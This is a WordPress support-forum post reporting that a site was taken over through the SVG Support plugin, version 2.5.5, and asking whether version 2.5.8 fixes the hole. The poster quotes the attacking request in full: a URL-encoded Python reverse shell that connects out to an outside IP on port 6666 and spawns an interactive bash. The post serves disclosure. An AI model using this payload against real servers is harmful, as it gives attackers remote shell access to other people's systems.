Security Vulnerability in SVG Support Plugin

  • Resolved manishwebosmotic

    (@manishwebosmotic)


    5 months, 3 weeks ago

    Dear Author,


    I hope this message finds you well. I am writing to inform you about a critical security vulnerability I encountered in the SVG Support plugin (Version 2.5.5) for WordPress.

    Recently, my website was compromised through the following API request that allowed remote code execution via the plugin:

    GET /wp-content/plugins/svg-support/svg-support.php?action=exec&cmd=python3%20-c%20'import%20socket,subprocess,os;%20s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);%20v_ip="172.234.23.237";%20s.connect((v_ip,6666));%20os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);%20v_shell_path="/bin/bash";v_shell_value="-i";%20p=subprocess.call([v_shell_path,v_shell_value]);' HTTP/1.1

    The request allows an attacker to gain shell access to my server, posing a serious security threat. I am currently using Version 2.5.5 of the plugin, but I see that the latest version is 2.5.8. I have disabled the plugin temporarily to secure my site.

    I would like to ask if this vulnerability has been addressed in Version 2.5.8 or if it still persists. If it has not been resolved, I urge you to investigate this matter and provide an update or patch to prevent other users from being exposed to this critical issue.

    Please let me know if there are any additional steps I can take to mitigate this vulnerability and further secure my website.

    Thank you for your attention to this urgent matter. I look forward to your response.

    Best regards,
    Let me know if you need any further changes!

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • You must be logged in to reply to this topic.